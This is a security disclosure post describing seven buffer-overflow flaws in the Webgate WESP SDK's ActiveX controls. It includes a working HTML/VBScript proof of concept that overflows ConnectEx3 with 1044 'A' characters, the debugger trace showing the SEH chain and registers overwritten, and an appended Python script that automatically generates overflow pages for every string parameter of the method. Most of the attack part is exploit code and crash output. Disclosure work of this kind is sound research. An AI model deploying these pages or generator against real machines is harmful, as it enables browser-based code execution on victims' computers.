Aerosol Posted February 25, 2015

Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports the same tools in both network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, Inc.

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow

CompanyName      WebgateInc
FileDescription  WESPConfig Module
FileVersion      1, 6, 42, 0
InternalName     WESPConfig
LegalCopyright   Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName      WESPConfig Module
ProductVersion   1, 6, 42, 0

****************** PoC for one of the above Vulnerabilities ***********

<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'></object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , ByVal extcompany As Long , ByVal authType As Long , ByVal AdditionalCode As String )"
memberName = "ConnectEx3"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount   = 8
-->
<script language='vbscript'>
arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"
target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
</script>
</html>

****************************** Stack trace for above PoC

Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141

Called From          Returns To
--------------------------------------------------
msvcrt.76ACD33D      WESPPlayback.999539
WESPPlayback.999539  41414141
41414141             22E5E0
22E5E0               2F712C
2F712C               41414141
41414141             41414141
41414141             41414141
41414141             41414141

Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020

Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX]    <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP

ArgDump:
--------------------------------------------------
EBP+8  41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]

P.S. CERT tried to coordinate with the vendor for fixing the issues but there wasn't any response from the vendor.

Best Regards,
Praveen Darshanam
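The PoC above is built from a commented metadata block (targetFile, prototype, memberName, progid, argCount) of the kind ActiveX fuzzers such as COMRaider emit: every argument is set to a benign default and exactly one String parameter is replaced with an overlong `String(n, "A")`. The script below is an added example, not part of the advisory and not Webgate or the advisory author's code. It reproduces that construction in Python and generalises it: it parses the VB-style prototype quoted in the PoC comment, finds every String-typed parameter, and renders one PoC page per such parameter, so the remaining string arguments of ConnectEx3 (UserID, Password, AdditionalCode) can be tried with the same harness. The CLSID and prototype are the ones the PoC quotes; the function names, default-value table and output file names are this example's own choices.

```python
import re

# Taken from the advisory's PoC comment block (the only two values not invented here).
CLSID = "4E14C449-A61A-4BF7-8082-65A91298A6D8"
PROTOTYPE = (
    "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , "
    "ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , "
    "ByVal extcompany As Long , ByVal authType As Long , "
    "ByVal AdditionalCode As String )"
)

# Benign VBScript literal per VB type, mirroring the 1 / "defaultV" values the PoC uses.
# Assumption of this example: any type not listed here gets the integer 1.
DEFAULTS = {"Integer": "1", "Long": "1", "Boolean": "True", "String": '"defaultV"'}

PROTO_RE = re.compile(r"\s*(?:Sub|Function)\s+(\w+)\s*\((.*)\)")
PARAM_RE = re.compile(r"(?:ByVal|ByRef)?\s*(\w+)\s+As\s+(\w+)")


def parse_prototype(proto):
    """Split a VB-style prototype into (member_name, [(param_name, vb_type), ...])."""
    m = PROTO_RE.match(proto)
    if not m:
        raise ValueError("unrecognised prototype: %r" % proto)
    params = []
    for chunk in m.group(2).split(","):
        chunk = chunk.strip()
        if not chunk:            # no-argument method, e.g. "Sub Foo ( )"
            continue
        pm = PARAM_RE.match(chunk)
        if not pm:
            raise ValueError("unrecognised parameter: %r" % chunk)
        params.append((pm.group(1), pm.group(2)))
    return m.group(1), params


def string_params(params):
    """1-based positions of the String-typed parameters: the overflow candidates."""
    return [i for i, (_, vb_type) in enumerate(params, 1) if vb_type == "String"]


def build_poc(proto, clsid, fuzz_index, fuzz_len):
    """Render the HTML/VBScript page with an overlong String in parameter fuzz_index (1-based)."""
    name, params = parse_prototype(proto)
    if fuzz_index not in string_params(params):
        raise ValueError("parameter %d of %s is not a String" % (fuzz_index, name))
    lines = [
        "<html>",
        "<object classid='clsid:%s' id='target'></object>" % clsid,
        "<script language='vbscript'>",
    ]
    for i, (_, vb_type) in enumerate(params, 1):
        if i == fuzz_index:
            literal = 'String(%d, "A")' % fuzz_len   # the overlong argument
        else:
            literal = DEFAULTS.get(vb_type, "1")     # benign value for everything else
        lines.append("arg%d=%s" % (i, literal))
    # Same call syntax as the PoC: "target.Member arg1 ,arg2 ,..."
    call_args = " ,".join("arg%d" % i for i in range(1, len(params) + 1))
    lines.append("target.%s %s" % (name, call_args))
    lines += ["</script>", "</html>"]
    return "\n".join(lines) + "\n"


def generate_pocs(proto, clsid, fuzz_len):
    """Yield (index, param_name, page) once per String parameter of the method."""
    _, params = parse_prototype(proto)
    for idx in string_params(params):
        yield idx, params[idx - 1][0], build_poc(proto, clsid, idx, fuzz_len)


if __name__ == "__main__":
    # Writes poc_ConnectEx3_arg2_Address.html, ..._arg4_UserID.html, etc. (names chosen here).
    for idx, pname, page in generate_pocs(PROTOTYPE, CLSID, 1044):
        fname = "poc_ConnectEx3_arg%d_%s.html" % (idx, pname)
        with open(fname, "w") as fh:
            fh.write(page)
        print("wrote", fname)
```

Only String parameters receive the overlong value: passing a 1044-byte string where the IDispatch prototype declares Integer or Long would fail type coercion before the method body runs, so those positions need boundary integers rather than `String(n, "A")`. Each generated page must be opened in Internet Explorer on a machine with the control registered, under a debugger, to observe a crash like the one in the trace above.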